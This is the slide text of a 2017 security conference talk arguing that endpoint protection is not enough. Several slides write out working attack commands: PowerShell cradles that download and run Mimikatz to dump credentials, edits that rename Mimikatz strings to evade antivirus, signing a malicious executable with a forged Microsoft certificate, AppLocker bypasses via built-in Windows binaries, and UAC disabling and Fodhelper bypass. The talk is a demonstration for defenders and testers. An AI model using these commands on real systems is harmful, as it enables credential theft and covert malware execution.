For #Redpill2017, The most offensive security conference in Thailand. This slide talks about the weak point of endpoint protection such as Antivirus, User Account Control, AppLocker.

1. Endpoint protection
is not enough.
By
Sumedt Jitpukdebodin
LPIC-1, NCLA, Comptia Security+, C|EHv6, eCPPT, IWSS, CPTE, GIAC GPEN, OSCP

2. # wHoAmi
• Name: Sumedt Jitpukdebodin
• Job: Security Consultant @ G-ABLE,
• Non-profit job: OWASP Thailand, 2600Thailand
• Hobbies: Hacking, Digital Forensic, Malware Analysis,
Programming, excite in many security fields.
• My item: www.techsuii.com, หนังสือก้าวแรกสู่นักทดสอบเจาะระบบ
• Another: Reconnaissance Me.

3. Objective
• Statistics
• Endpoint Protection
• Bypassing

4. Statistics

5. Malware Statistics

6. Distribution of malware
under Windows in 2016

7. TOP 10 file extensions
malware Q1 2017

8. Endpoint Protection

9. What is Endpoint Protection?
• Endpoint security or endpoint protection is an approach
to the protection of computer networks that are remotely
bridged to client devices. The connection of laptops,
tablets, mobile phones and other wireless devices to
corporate networks creates attack paths for security
threats.

10. Why we use Endpoint
Protection

11. How Antivirus works
• Based on heuristic
• Based on signature
• Based on cloud

12. Evasion Techniques
• Anti-security techniques (Avoid detection)
• Anti-sandbox techniques (Avoid automatic analysis)
• Anti-analyst techniques (Avoid analysis)

13. Anti-security techniques
• Obfuscation
• Crypter
• Packer
• FUD (Fully UnDetectable by antimalware)
• etc.

14. Framework for generate
bypass antivirus malware
• Veil
• TheFatRat
• Winpayloads
• Dr0p1t-Framework
• Avet
• VBad
• Obfuscated Empire
• OWASP-ZSC
• etc

15. Invoke-Mimikatz
• powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI');
Invoke-Mimikatz -DumpCreds"

16. Just a Mimikatz
• sed -i -e 's/Invoke-Mimikatz/Invoke-redpill2017/g' redpill2017.ps1
• sed -i -e '/<#/,/#>/c' redpill2017.ps1
• sed -i -e 's/^[[:space:]]*#.*$//g' redpill2017.ps1
• sed -i -e 's/DumpCreds/DumpCred/g' redpill2017.ps1
• sed -i -e 's/ArgumentPtr/NotTodayPal/g' redpill2017.ps1
• sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g'
redpill2017.ps1
• sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions
$Win32Functions #-/g" redpill2017.ps1

17. Show time (1)

18. Invoke-redpill2017
• powershell "IEX (New-Object
Net.WebClient).DownloadString('http://10.211.55.3:9000/
redpill2017.ps1'); Invoke-redpill2017 -DumpCred"

19. Sign malware with fake
certificate
• osslsigncode verify <microsoft exe>
• openssl req -x509 -newkey rsa:4096 -keyout
fake_microsoft_key.pem -out fake_microsoft_cert.pem -
days 365 -subj “/C=US/ST=Washington/L=Redmond/
O=Microsoft Corporation/OU=MOPR/CN=Microsoft
Corporation”
• osslsigncode sign -in evil.exe -key
fake_microsoft_key.pem -certs fake_microsoft_cert.pem -
out evil_signed.exe

21. But run EXE is so hard…

22. Try to use indirect ways
• Macro
• vbs
• DLL
• hta (HTML Application)
• PS1
• etc.

23. Example of HTA with
vbscript

24. Show time (2)

25. AppLocker
• Whitelisting application
• Executable files, scripts, Windows Installer files,
dynamic-link libraries (DLLs), packaged apps, and
packaged app installers
• Windows 7 >
• Single computer (secpol.msc), Group Policy Management
(gpmc.msc)

26. AppLocker File Type
• These are regular .exe and .com applications (cmd.exe,
ipconfig.exe, etc.)
• Windows Installer files (.msi, .msp, .mst), typically used to
install a new software on the machine.
• Script files with the following
extensions .ps1, .vbs, .vba, .cmd and .js.
• Packaged Apps installed through the Microsoft Store
• DLL files (.dll and .ocx in the advanced tab).

27. AppLocker Rule
• Execution Path
• Publisher Information
• File Hash

28. Bypass AppLocker
• Find exception path
• “C:WindowsTasks”
• “C:Windowstracing”
• Load file from memory (PowerSploit framework)
• $ByteArray = [System.IO.File]::ReadAllBytes(“C:usersricharddesktopmimikatz.exe");
• Invoke-expression(Get-Content .Invoke-ReflectivePEInjection.ps1 |out-string)
• Invoke-ReflectivePEInjection -PEBytes $ByteArray
• Obfuscate exe for bypass hash
• Powershell without powershell (Casey Smith) (Powershell Empire) and StarFighter
• Registry Key Manipulation
• Run PE file by using microsoft tool
• C:windowssystem32rundll32.exe
• C:WindowsMicrosoft.NETFrameworkv2.0.50727InstallUtil.exe ( install and uninstall applications via the command
prompt)
• C:WindowsSystem32regsvr32.exe (Install and Uninstall dll file)
• C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe (Using to build products in environments where Visual
Studio is not installed)

29. Show time (3)

30. UAC
• User Account Control (UAC)
• Run with standard user rights instead of full administrator rights
• C:WindowsSystem32cmd.exe /k %windir%System32reg.exe ADD
HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v
EnableLUA /t REG_DWORD /d 0 /f
• C:WindowsSystem32cmd.exe /k %windir%System32reg.exe ADD
HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v
EnableLUA /t REG_DWORD /d 1 /f

31. Bypass UAC
• Using mistake of any autoElevate binary (Using sigcheck for check autoElevate flag)
• UACMe
• DLL Hijacking
• autoElevate
• Elevated COM interface
• SDCLT - Backup command with specific option
• Fodhelper - Manage Optional Features
• Using process or dll injection into Windows Publisher Certificate
• Using Windows Update Standalone Installer (wusa.exe)
• etc.

32. Bypass UAC with Fodhelper
• Fodhelper.exe (%WINDIR%System32fodhelper.exe)
• Missing registry
• HKCU:SoftwareClassesms-settingsshellopencommand
• HKCU:SoftwareClassesms-settingsshellopencommandDelegateExecute
• HKCU:SoftwareClassesms-settingsshellopencommand(default)

33. The last show time (4)

34. Protecting against malware
• People: Security Awareness Training, Always update yourself.
• Process: Restrict program install or usage with policy, Updates,
Backups, Governance, Intelligence, Incident response plan, and more =>
Security Team
• Technology: Technology supports the team and processes
• Backup
• Antivirus
• Anti-ransomware
• Endpoint Detection

35. Q & A

36. Resource
• https://www.blackhillsinfosec.com/?p=5555
• https://github.com/nccgroup/Winpayloads
• https://www.youtube.com/watch?v=6bUoz5ChTOs
• https://github.com/D4Vinci/Dr0p1t-Framework
• https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf
• https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf
• https://github.com/Pepitoh/VBad
• https://stackoverflow.com/questions/18287960/signing-windows-application-on-linux-based-distros
• https://twitter.com/Andrew___Morris/status/879712530041626627
• https://github.com/cobbr/ObfuscatedEmpire
• https://pentestlab.blog/tag/uac/
• https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
• https://www.greyhathacker.net/?p=796
• https://pen-testing.sans.org/resources/papers/gpen/windows-script-host-hack-windows-120189
• https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques
• https://www.slideshare.net/CTruncer/the-supporting-role-of-antivirus-evasion-while-persisting
• https://github.com/api0cradle/UltimateAppLockerByPassList
• https://offsec.provadys.com/UAC-bypass-dotnet.html